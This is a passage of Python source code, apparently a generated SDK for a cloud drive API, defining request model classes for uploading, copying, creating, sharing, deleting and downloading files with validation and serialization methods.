            mapping['share_id'] = self.share_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        share_id = source.get('share_id')
        if share_id is not None:
            self.share_id = share_id
        return self
class CompleteFileRequest(TeaModel):
    """
    Request for merging the uploaded parts of a multipart file upload.
    """
    def __init__(
        self,
        addition_data: dict = None,
        drive_id: str = None,
        file_id: str = None,
        part_info_list: List[UploadPartInfo] = None,
        share_id: str = None,
        upload_id: str = None,
    ):
        # extra key/value payload forwarded with the request
        self.addition_data = addition_data
        # numeric drive identifier
        self.drive_id = drive_id
        # target file identifier (required)
        self.file_id = file_id
        # descriptors of the uploaded parts to merge
        self.part_info_list = part_info_list
        self.share_id = share_id
        # multipart upload session identifier
        self.upload_id = upload_id

    def validate(self):
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
        if self.part_info_list:
            for part in self.part_info_list:
                if part:
                    part.validate()

    def to_map(self):
        mapping = {}
        if self.addition_data is not None:
            mapping['addition_data'] = self.addition_data
        if self.drive_id is not None:
            mapping['drive_id'] = self.drive_id
        if self.file_id is not None:
            mapping['file_id'] = self.file_id
        mapping['part_info_list'] = []
        if self.part_info_list is not None:
            mapping['part_info_list'] = [
                part.to_map() if part else None for part in self.part_info_list
            ]
        if self.share_id is not None:
            mapping['share_id'] = self.share_id
        if self.upload_id is not None:
            mapping['upload_id'] = self.upload_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        if source.get('addition_data') is not None:
            self.addition_data = source.get('addition_data')
        if source.get('drive_id') is not None:
            self.drive_id = source.get('drive_id')
        if source.get('file_id') is not None:
            self.file_id = source.get('file_id')
        self.part_info_list = []
        if source.get('part_info_list') is not None:
            self.part_info_list = [
                UploadPartInfo().from_map(part) for part in source.get('part_info_list')
            ]
        if source.get('share_id') is not None:
            self.share_id = source.get('share_id')
        if source.get('upload_id') is not None:
            self.upload_id = source.get('upload_id')
        return self
class CopyFileRequest(TeaModel):
    """
    Request for copying a file to another parent/drive/share.
    """
    def __init__(
        self,
        auto_rename: bool = None,
        drive_id: str = None,
        file_id: str = None,
        file_id_path: str = None,
        new_name: str = None,
        share_id: str = None,
        to_drive_id: str = None,
        to_parent_file_id: str = None,
        to_share_id: str = None,
    ):
        # auto_rename
        # type: boolean
        # (fixed: was a stray bare `type: boolean` annotation statement emitted
        # by the code generator instead of a comment)
        self.auto_rename = auto_rename
        # drive_id
        self.drive_id = drive_id
        # file_id
        self.file_id = file_id
        self.file_id_path = file_id_path
        # new_name
        self.new_name = new_name
        # share_id, either share_id or drive_id is required
        self.share_id = share_id
        # to_drive_id
        self.to_drive_id = to_drive_id
        # to_parent_file_id
        self.to_parent_file_id = to_parent_file_id
        # to_share_id  (fixed: comment wrongly said "to_drive_id")
        self.to_share_id = to_share_id

    def validate(self):
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
        if self.new_name is not None:
            self.validate_max_length(self.new_name, 'new_name', 1024)
        if self.to_drive_id is not None:
            self.validate_pattern(self.to_drive_id, 'to_drive_id', '[0-9]+')
        self.validate_required(self.to_parent_file_id, 'to_parent_file_id')
        if self.to_parent_file_id is not None:
            self.validate_max_length(self.to_parent_file_id, 'to_parent_file_id', 50)
            self.validate_pattern(self.to_parent_file_id, 'to_parent_file_id', '[a-z0-9.-_]{1,50}')
        if self.to_share_id is not None:
            self.validate_pattern(self.to_share_id, 'to_share_id', '[0-9]+')

    def to_map(self):
        result = dict()
        if self.auto_rename is not None:
            result['auto_rename'] = self.auto_rename
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.file_id is not None:
            result['file_id'] = self.file_id
        if self.file_id_path is not None:
            result['file_id_path'] = self.file_id_path
        if self.new_name is not None:
            result['new_name'] = self.new_name
        if self.share_id is not None:
            result['share_id'] = self.share_id
        if self.to_drive_id is not None:
            result['to_drive_id'] = self.to_drive_id
        if self.to_parent_file_id is not None:
            result['to_parent_file_id'] = self.to_parent_file_id
        if self.to_share_id is not None:
            result['to_share_id'] = self.to_share_id
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('auto_rename') is not None:
            self.auto_rename = m.get('auto_rename')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('file_id') is not None:
            self.file_id = m.get('file_id')
        if m.get('file_id_path') is not None:
            self.file_id_path = m.get('file_id_path')
        if m.get('new_name') is not None:
            self.new_name = m.get('new_name')
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        if m.get('to_drive_id') is not None:
            self.to_drive_id = m.get('to_drive_id')
        if m.get('to_parent_file_id') is not None:
            self.to_parent_file_id = m.get('to_parent_file_id')
        if m.get('to_share_id') is not None:
            self.to_share_id = m.get('to_share_id')
        return self
class CreateDriveRequest(TeaModel):
    """
    create drive request
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        default: bool = None,
        description: str = None,
        drive_name: str = None,
        drive_type: str = None,
        encrypt_mode: str = None,
        location: str = None,
        owner: str = None,
        relative_path: str = None,
        status: str = None,
        store_id: str = None,
        total_size: int = None,
    ):
        self.headers = headers
        # whether this is the default drive; only one default drive is allowed
        self.default = default
        # description text (max length 1024, see validate())
        self.description = description
        # drive name (required)
        self.drive_name = drive_name
        # drive type
        self.drive_type = drive_type
        self.encrypt_mode = encrypt_mode
        # location
        self.location = location
        # owner (required)
        self.owner = owner
        # relative path of the drive inside the store; required when the
        # domain's PathType is OSSPath
        self.relative_path = relative_path
        # status
        self.status = status
        # store ID; required when the domain's PathType is OSSPath
        self.store_id = store_id
        # total size in bytes (-1 means unlimited)
        self.total_size = total_size
    def validate(self):
        """Check required fields and length limits (TeaModel helpers)."""
        if self.description is not None:
            self.validate_max_length(self.description, 'description', 1024)
        self.validate_required(self.drive_name, 'drive_name')
        if self.drive_name is not None:
            self.validate_max_length(self.drive_name, 'drive_name', 1024)
        self.validate_required(self.owner, 'owner')
    def to_map(self):
        """Serialize the set (non-None) fields; map keys equal attribute names."""
        pairs = (
            ('headers', self.headers),
            ('default', self.default),
            ('description', self.description),
            ('drive_name', self.drive_name),
            ('drive_type', self.drive_type),
            ('encrypt_mode', self.encrypt_mode),
            ('location', self.location),
            ('owner', self.owner),
            ('relative_path', self.relative_path),
            ('status', self.status),
            ('store_id', self.store_id),
            ('total_size', self.total_size),
        )
        return {key: value for key, value in pairs if value is not None}
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        for key in ('headers', 'default', 'description', 'drive_name',
                    'drive_type', 'encrypt_mode', 'location', 'owner',
                    'relative_path', 'status', 'store_id', 'total_size'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class ImageMediaMetadata(TeaModel):
    """Image dimension metadata (height/width)."""
    def __init__(
        self,
        height: int = None,
        width: int = None,
    ):
        # image height
        self.height = height
        # image width
        self.width = width
    def validate(self):
        # No constraints to enforce.
        pass
    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        pairs = (('height', self.height), ('width', self.width))
        return {key: value for key, value in pairs if value is not None}
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        for key in ('height', 'width'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class VideoMediaMetadata(TeaModel):
    """Video metadata (duration only)."""
    def __init__(
        self,
        duration: str = None,
    ):
        # video duration
        self.duration = duration
    def validate(self):
        # No constraints to enforce.
        pass
    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        return {} if self.duration is None else {'duration': self.duration}
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        value = m.get('duration')
        if value is not None:
            self.duration = value
        return self
class CreateFileRequest(TeaModel):
    """
    Create file request.

    Either ``share_id`` or ``drive_id`` identifies the target space;
    ``name``, ``parent_file_id`` and ``type`` are required (see validate()).
    """
    def __init__(
        self,
        addition_data: dict = None,
        auto_rename: bool = None,
        check_name_mode: str = None,
        content_hash: str = None,
        content_hash_name: str = None,
        content_md_5: str = None,
        content_type: str = None,
        description: str = None,
        drive_id: str = None,
        encrypt_mode: str = None,
        file_id: str = None,
        force_upload_to_location: bool = None,
        hidden: bool = None,
        image_media_metadata: ImageMediaMetadata = None,
        labels: List[str] = None,
        last_updated_at: str = None,
        location: str = None,
        meta: str = None,
        name: str = None,
        parent_file_id: str = None,
        parent_file_id_path: str = None,
        part_info_list: List[UploadPartInfo] = None,
        pre_hash: str = None,
        share_id: str = None,
        size: int = None,
        streams_info: dict = None,
        type: str = None,
        user_meta: str = None,
        video_media_metadata: VideoMediaMetadata = None,
    ):
        # addition_data
        self.addition_data = addition_data
        self.auto_rename = auto_rename
        # check_name_mode
        self.check_name_mode = check_name_mode
        # content_hash
        self.content_hash = content_hash
        # content_hash_name
        self.content_hash_name = content_hash_name
        # content MD5; serialized under the key 'content_md5'
        self.content_md_5 = content_md_5
        # content type
        self.content_type = content_type
        # description (max length 1024, see validate())
        self.description = description
        # drive_id (numeric string)
        self.drive_id = drive_id
        # encrypt_mode
        self.encrypt_mode = encrypt_mode
        # file_id
        self.file_id = file_id
        # force_upload_to_location
        self.force_upload_to_location = force_upload_to_location
        # hidden
        self.hidden = hidden
        self.image_media_metadata = image_media_metadata
        # labels
        self.labels = labels
        # last_updated_at
        self.last_updated_at = last_updated_at
        # location
        self.location = location
        self.meta = meta
        # name (required, max length 1024)
        self.name = name
        # parent_file_id (required)
        self.parent_file_id = parent_file_id
        self.parent_file_id_path = parent_file_id_path
        # part_info_list
        self.part_info_list = part_info_list
        # pre_hash
        self.pre_hash = pre_hash
        # share_id
        # NOTE(review): the generator left a stray bare `example` expression
        # here, which raised NameError every time __init__ ran; removed.
        self.share_id = share_id
        # size in bytes (0 .. 53687091200, see validate())
        self.size = size
        # streams_info
        self.streams_info = streams_info
        # type (required; the parameter name shadows the builtin but is part
        # of the generated public interface, so it is kept)
        self.type = type
        # user_meta
        self.user_meta = user_meta
        self.video_media_metadata = video_media_metadata
    def validate(self):
        """Check required fields, length/pattern/range limits, and nested models."""
        if self.description is not None:
            self.validate_max_length(self.description, 'description', 1024)
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.image_media_metadata:
            self.image_media_metadata.validate()
        self.validate_required(self.name, 'name')
        if self.name is not None:
            self.validate_max_length(self.name, 'name', 1024)
        self.validate_required(self.parent_file_id, 'parent_file_id')
        if self.parent_file_id is not None:
            self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
            self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
        if self.part_info_list:
            for k in self.part_info_list:
                if k:
                    k.validate()
        if self.size is not None:
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)
        self.validate_required(self.type, 'type')
        if self.video_media_metadata:
            self.video_media_metadata.validate()
    def to_map(self):
        """Serialize set fields to a plain dict (nested models via their to_map)."""
        result = dict()
        if self.addition_data is not None:
            result['addition_data'] = self.addition_data
        if self.auto_rename is not None:
            result['auto_rename'] = self.auto_rename
        if self.check_name_mode is not None:
            result['check_name_mode'] = self.check_name_mode
        if self.content_hash is not None:
            result['content_hash'] = self.content_hash
        if self.content_hash_name is not None:
            result['content_hash_name'] = self.content_hash_name
        if self.content_md_5 is not None:
            result['content_md5'] = self.content_md_5
        if self.content_type is not None:
            result['content_type'] = self.content_type
        if self.description is not None:
            result['description'] = self.description
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.encrypt_mode is not None:
            result['encrypt_mode'] = self.encrypt_mode
        if self.file_id is not None:
            result['file_id'] = self.file_id
        if self.force_upload_to_location is not None:
            result['force_upload_to_location'] = self.force_upload_to_location
        if self.hidden is not None:
            result['hidden'] = self.hidden
        if self.image_media_metadata is not None:
            result['image_media_metadata'] = self.image_media_metadata.to_map()
        if self.labels is not None:
            result['labels'] = self.labels
        if self.last_updated_at is not None:
            result['last_updated_at'] = self.last_updated_at
        if self.location is not None:
            result['location'] = self.location
        if self.meta is not None:
            result['meta'] = self.meta
        if self.name is not None:
            result['name'] = self.name
        if self.parent_file_id is not None:
            result['parent_file_id'] = self.parent_file_id
        if self.parent_file_id_path is not None:
            result['parent_file_id_path'] = self.parent_file_id_path
        # part_info_list is always emitted (possibly empty), matching the
        # generated wire format.
        result['part_info_list'] = []
        if self.part_info_list is not None:
            for k in self.part_info_list:
                result['part_info_list'].append(k.to_map() if k else None)
        if self.pre_hash is not None:
            result['pre_hash'] = self.pre_hash
        if self.share_id is not None:
            result['share_id'] = self.share_id
        if self.size is not None:
            result['size'] = self.size
        if self.streams_info is not None:
            result['streams_info'] = self.streams_info
        if self.type is not None:
            result['type'] = self.type
        if self.user_meta is not None:
            result['user_meta'] = self.user_meta
        if self.video_media_metadata is not None:
            result['video_media_metadata'] = self.video_media_metadata.to_map()
        return result
    def from_map(self, m: dict = None):
        """Populate from a plain dict (nested models via from_map); returns self."""
        m = m or dict()
        if m.get('addition_data') is not None:
            self.addition_data = m.get('addition_data')
        if m.get('auto_rename') is not None:
            self.auto_rename = m.get('auto_rename')
        if m.get('check_name_mode') is not None:
            self.check_name_mode = m.get('check_name_mode')
        if m.get('content_hash') is not None:
            self.content_hash = m.get('content_hash')
        if m.get('content_hash_name') is not None:
            self.content_hash_name = m.get('content_hash_name')
        if m.get('content_md5') is not None:
            self.content_md_5 = m.get('content_md5')
        if m.get('content_type') is not None:
            self.content_type = m.get('content_type')
        if m.get('description') is not None:
            self.description = m.get('description')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('encrypt_mode') is not None:
            self.encrypt_mode = m.get('encrypt_mode')
        if m.get('file_id') is not None:
            self.file_id = m.get('file_id')
        if m.get('force_upload_to_location') is not None:
            self.force_upload_to_location = m.get('force_upload_to_location')
        if m.get('hidden') is not None:
            self.hidden = m.get('hidden')
        if m.get('image_media_metadata') is not None:
            temp_model = ImageMediaMetadata()
            self.image_media_metadata = temp_model.from_map(m['image_media_metadata'])
        if m.get('labels') is not None:
            self.labels = m.get('labels')
        if m.get('last_updated_at') is not None:
            self.last_updated_at = m.get('last_updated_at')
        if m.get('location') is not None:
            self.location = m.get('location')
        if m.get('meta') is not None:
            self.meta = m.get('meta')
        if m.get('name') is not None:
            self.name = m.get('name')
        if m.get('parent_file_id') is not None:
            self.parent_file_id = m.get('parent_file_id')
        if m.get('parent_file_id_path') is not None:
            self.parent_file_id_path = m.get('parent_file_id_path')
        # part_info_list is always reset, matching to_map's unconditional key.
        self.part_info_list = []
        if m.get('part_info_list') is not None:
            for k in m.get('part_info_list'):
                temp_model = UploadPartInfo()
                self.part_info_list.append(temp_model.from_map(k))
        if m.get('pre_hash') is not None:
            self.pre_hash = m.get('pre_hash')
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        if m.get('size') is not None:
            self.size = m.get('size')
        if m.get('streams_info') is not None:
            self.streams_info = m.get('streams_info')
        if m.get('type') is not None:
            self.type = m.get('type')
        if m.get('user_meta') is not None:
            self.user_meta = m.get('user_meta')
        if m.get('video_media_metadata') is not None:
            temp_model = VideoMediaMetadata()
            self.video_media_metadata = temp_model.from_map(m['video_media_metadata'])
        return self
class CreateShareLinkRequest(TeaModel):
    """
    create_share_link request
    """
    def __init__(
        self,
        description: str = None,
        drive_id: str = None,
        expiration: str = None,
        file_id: str = None,
        file_id_list: List[str] = None,
        file_path_list: List[str] = None,
        share_name: str = None,
        share_pwd: str = None,
    ):
        # description
        self.description = description
        # drive_id (numeric string, required)
        self.drive_id = drive_id
        # expiration (required)
        self.expiration = expiration
        # file_id (required)
        self.file_id = file_id
        # file_id_list (required)
        self.file_id_list = file_id_list
        # file_path_list (required)
        self.file_path_list = file_path_list
        # share_name
        self.share_name = share_name
        # share_pwd
        self.share_pwd = share_pwd
    def validate(self):
        """Check required fields and limits (TeaModel helpers)."""
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.expiration, 'expiration')
        self.validate_required(self.file_id, 'file_id')
        self.validate_required(self.file_id_list, 'file_id_list')
        if self.file_id_list is not None:
            self.validate_maximum(self.file_id_list, 'file_id_list', 50)
            self.validate_minimum(self.file_id_list, 'file_id_list', 1)
        self.validate_required(self.file_path_list, 'file_path_list')
        if self.file_path_list is not None:
            self.validate_maximum(self.file_path_list, 'file_path_list', 50)
            self.validate_minimum(self.file_path_list, 'file_path_list', 1)
        if self.share_pwd is not None:
            self.validate_maximum(self.share_pwd, 'share_pwd', 64)
            self.validate_minimum(self.share_pwd, 'share_pwd', 0)
    def to_map(self):
        """Serialize the set (non-None) fields; map keys equal attribute names."""
        pairs = (
            ('description', self.description),
            ('drive_id', self.drive_id),
            ('expiration', self.expiration),
            ('file_id', self.file_id),
            ('file_id_list', self.file_id_list),
            ('file_path_list', self.file_path_list),
            ('share_name', self.share_name),
            ('share_pwd', self.share_pwd),
        )
        return {key: value for key, value in pairs if value is not None}
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        for key in ('description', 'drive_id', 'expiration', 'file_id',
                    'file_id_list', 'file_path_list', 'share_name', 'share_pwd'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class CreateShareRequest(TeaModel):
    """
    create share request
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        description: str = None,
        drive_id: str = None,
        expiration: str = None,
        owner: str = None,
        owner_type: str = None,
        permissions: List[str] = None,
        share_file_id: str = None,
        share_file_path: str = None,
        share_name: str = None,
        share_policy: List[SharePermissionPolicy] = None,
        status: str = None,
    ):
        self.headers = headers
        # description
        self.description = description
        # drive_id (numeric string, required)
        self.drive_id = drive_id
        # expiration
        self.expiration = expiration
        # owner (required)
        self.owner = owner
        # owner_type
        self.owner_type = owner_type
        # permissions
        self.permissions = permissions
        # share_file_id
        self.share_file_id = share_file_id
        # share_file_path
        self.share_file_path = share_file_path
        # share_name
        self.share_name = share_name
        # share create policy (share_policy)
        # NOTE(review): the generator left a stray bare `share_policy`
        # expression here (a no-op, since it named the parameter); removed.
        self.share_policy = share_policy
        # status
        self.status = status
    def validate(self):
        """Check required fields, drive_id pattern, and nested policy models."""
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.owner, 'owner')
        if self.share_policy:
            for k in self.share_policy:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize set fields; share_policy is always emitted (possibly empty)."""
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.description is not None:
            result['description'] = self.description
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.expiration is not None:
            result['expiration'] = self.expiration
        if self.owner is not None:
            result['owner'] = self.owner
        if self.owner_type is not None:
            result['owner_type'] = self.owner_type
        if self.permissions is not None:
            result['permissions'] = self.permissions
        if self.share_file_id is not None:
            result['share_file_id'] = self.share_file_id
        if self.share_file_path is not None:
            result['share_file_path'] = self.share_file_path
        if self.share_name is not None:
            result['share_name'] = self.share_name
        result['share_policy'] = []
        if self.share_policy is not None:
            for k in self.share_policy:
                result['share_policy'].append(k.to_map() if k else None)
        if self.status is not None:
            result['status'] = self.status
        return result
    def from_map(self, m: dict = None):
        """Populate from a plain dict (share_policy via nested from_map); returns self."""
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('description') is not None:
            self.description = m.get('description')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('expiration') is not None:
            self.expiration = m.get('expiration')
        if m.get('owner') is not None:
            self.owner = m.get('owner')
        if m.get('owner_type') is not None:
            self.owner_type = m.get('owner_type')
        if m.get('permissions') is not None:
            self.permissions = m.get('permissions')
        if m.get('share_file_id') is not None:
            self.share_file_id = m.get('share_file_id')
        if m.get('share_file_path') is not None:
            self.share_file_path = m.get('share_file_path')
        if m.get('share_name') is not None:
            self.share_name = m.get('share_name')
        # share_policy is always reset, matching to_map's unconditional key.
        self.share_policy = []
        if m.get('share_policy') is not None:
            for k in m.get('share_policy'):
                temp_model = SharePermissionPolicy()
                self.share_policy.append(temp_model.from_map(k))
        if m.get('status') is not None:
            self.status = m.get('status')
        return self
class DeleteDriveRequest(TeaModel):
    """
    Delete drive request
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        drive_id: str = None,
    ):
        self.headers = headers
        # drive ID (required)
        self.drive_id = drive_id
    def validate(self):
        """drive_id must be supplied."""
        self.validate_required(self.drive_id, 'drive_id')
    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        pairs = (('headers', self.headers), ('drive_id', self.drive_id))
        return {key: value for key, value in pairs if value is not None}
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        for key in ('headers', 'drive_id'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class DeleteFileRequest(TeaModel):
    """
    Delete file request (删除文件请求).
    """
    def __init__(
        self,
        drive_id: str = None,
        file_id: str = None,
        file_id_path: str = None,
        permanently: bool = None,
        share_id: str = None,
    ):
        # drive_id (numeric string)
        self.drive_id = drive_id
        self.file_id = file_id
        self.file_id_path = file_id_path
        # permanently
        # NOTE(review): the generator left a stray `type: false` annotation
        # statement here (a runtime no-op inside a function body); removed.
        self.permanently = permanently
        self.share_id = share_id
    def validate(self):
        """drive_id, when set, must be a numeric string."""
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        result = dict()
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.file_id is not None:
            result['file_id'] = self.file_id
        if self.file_id_path is not None:
            result['file_id_path'] = self.file_id_path
        if self.permanently is not None:
            result['permanently'] = self.permanently
        if self.share_id is not None:
            result['share_id'] = self.share_id
        return result
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('file_id') is not None:
            self.file_id = m.get('file_id')
        if m.get('file_id_path') is not None:
            self.file_id_path = m.get('file_id_path')
        if m.get('permanently') is not None:
            self.permanently = m.get('permanently')
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        return self
class DeleteFilesRequest(TeaModel):
    """
    Batch delete files request (批量删除文件请求).
    """
    def __init__(
        self,
        drive_id: str = None,
        file_id_list: List[str] = None,
        share_id: str = None,
    ):
        # drive_id (numeric string)
        self.drive_id = drive_id
        # file_id_list (required)
        self.file_id_list = file_id_list
        # share_id
        self.share_id = share_id
    def validate(self):
        """file_id_list is required; drive_id, when set, must be numeric."""
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id_list, 'file_id_list')
    def to_map(self):
        """Serialize the set (non-None) fields; map keys equal attribute names."""
        pairs = (
            ('drive_id', self.drive_id),
            ('file_id_list', self.file_id_list),
            ('share_id', self.share_id),
        )
        return {key: value for key, value in pairs if value is not None}
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        for key in ('drive_id', 'file_id_list', 'share_id'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class DeleteShareRequest(TeaModel):
    """
    delete share request
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        share_id: str = None,
    ):
        self.headers = headers
        # share_id (required)
        self.share_id = share_id
    def validate(self):
        """share_id must be supplied."""
        self.validate_required(self.share_id, 'share_id')
    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        pairs = (('headers', self.headers), ('share_id', self.share_id))
        return {key: value for key, value in pairs if value is not None}
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        for key in ('headers', 'share_id'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class DownloadRequest(TeaModel):
    """
    Download file request body (下载文件请求body).

    Note: unlike most models in this file, this one serializes with
    CamelCase map keys ('DriveID', 'FileID', ...) for the first five fields.
    """
    def __init__(
        self,
        drive_id: str = None,
        file_id: str = None,
        image_thumbnail_process: str = None,
        share_id: str = None,
        video_thumbnail_process: str = None,
        file_id_path: str = None,
        location: str = None,
        referer: str = None,
        sign_token: str = None,
    ):
        # drive id
        self.drive_id = drive_id
        # file id (required)
        self.file_id = file_id
        # image_thumbnail_process (in: query)
        # NOTE(review): a stray bare `image_thumbnail_process` expression
        # stood here in the generated code (a no-op, since it named the
        # parameter); removed.
        self.image_thumbnail_process = image_thumbnail_process
        # share_id, either share_id or drive_id is required
        self.share_id = share_id
        # video_thumbnail_process (type: string)
        # NOTE(review): removed a stray `type:string` annotation statement.
        self.video_thumbnail_process = video_thumbnail_process
        self.file_id_path = file_id_path
        # location
        self.location = location
        self.referer = referer
        self.sign_token = sign_token
    def validate(self):
        """file_id must be supplied."""
        self.validate_required(self.file_id, 'file_id')
    def to_map(self):
        """Serialize set fields; CamelCase keys for the legacy query fields."""
        result = dict()
        if self.drive_id is not None:
            result['DriveID'] = self.drive_id
        if self.file_id is not None:
            result['FileID'] = self.file_id
        if self.image_thumbnail_process is not None:
            result['ImageThumbnailProcess'] = self.image_thumbnail_process
        if self.share_id is not None:
            result['ShareID'] = self.share_id
        if self.video_thumbnail_process is not None:
            result['VideoThumbnailProcess'] = self.video_thumbnail_process
        if self.file_id_path is not None:
            result['file_id_path'] = self.file_id_path
        if self.location is not None:
            result['location'] = self.location
        if self.referer is not None:
            result['referer'] = self.referer
        if self.sign_token is not None:
            result['sign_token'] = self.sign_token
        return result
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        if m.get('DriveID') is not None:
            self.drive_id = m.get('DriveID')
        if m.get('FileID') is not None:
            self.file_id = m.get('FileID')
        if m.get('ImageThumbnailProcess') is not None:
            self.image_thumbnail_process = m.get('ImageThumbnailProcess')
        if m.get('ShareID') is not None:
            self.share_id = m.get('ShareID')
        if m.get('VideoThumbnailProcess') is not None:
            self.video_thumbnail_process = m.get('VideoThumbnailProcess')
        if m.get('file_id_path') is not None:
            self.file_id_path = m.get('file_id_path')
        if m.get('location') is not None:
            self.location = m.get('location')
        if m.get('referer') is not None:
            self.referer = m.get('referer')
        if m.get('sign_token') is not None:
            self.sign_token = m.get('sign_token')
        return self
class GetAsyncTaskRequest(TeaModel):
    """
    Get async task info request (获取异步任务信息).
    """
    def __init__(
        self,
        async_task_id: str = None,
    ):
        # async_task_id (type: string)
        # NOTE(review): removed a stray `type:string` annotation statement
        # left by the generator (a runtime no-op inside a function body).
        self.async_task_id = async_task_id
    def validate(self):
        # No constraints to enforce.
        pass
    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        result = dict()
        if self.async_task_id is not None:
            result['async_task_id'] = self.async_task_id
        return result
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        if m.get('async_task_id') is not None:
            self.async_task_id = m.get('async_task_id')
        return self
class GetDefaultDriveRequest(TeaModel):
    """
    Get default drive request
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        user_id: str = None,
    ):
        self.headers = headers
        # user ID
        self.user_id = user_id
    def validate(self):
        # No constraints to enforce.
        pass
    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        pairs = (('headers', self.headers), ('user_id', self.user_id))
        return {key: value for key, value in pairs if value is not None}
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        for key in ('headers', 'user_id'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class GetDownloadUrlRequest(TeaModel):
    """
    Get file download URL request body (获取文件下载地址的请求body).
    """
    def __init__(
        self,
        addition_data: dict = None,
        drive_id: str = None,
        expire_sec: int = None,
        file_id: str = None,
        file_id_path: str = None,
        file_name: str = None,
        location: str = None,
        referer: str = None,
        share_id: str = None,
        sign_token: str = None,
    ):
        # addition_data
        self.addition_data = addition_data
        # drive_id (numeric string, required)
        self.drive_id = drive_id
        # expire_sec (1 .. 14400, see validate())
        self.expire_sec = expire_sec
        # file_id (required)
        self.file_id = file_id
        self.file_id_path = file_id_path
        # file_name (max length 1024)
        self.file_name = file_name
        # location
        self.location = location
        self.referer = referer
        # share_id, either share_id or drive_id is required
        self.share_id = share_id
        self.sign_token = sign_token
    def validate(self):
        """Check required fields, patterns, and ranges (TeaModel helpers)."""
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.expire_sec is not None:
            self.validate_maximum(self.expire_sec, 'expire_sec', 14400)
            self.validate_minimum(self.expire_sec, 'expire_sec', 1)
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
        if self.file_name is not None:
            self.validate_max_length(self.file_name, 'file_name', 1024)
    def to_map(self):
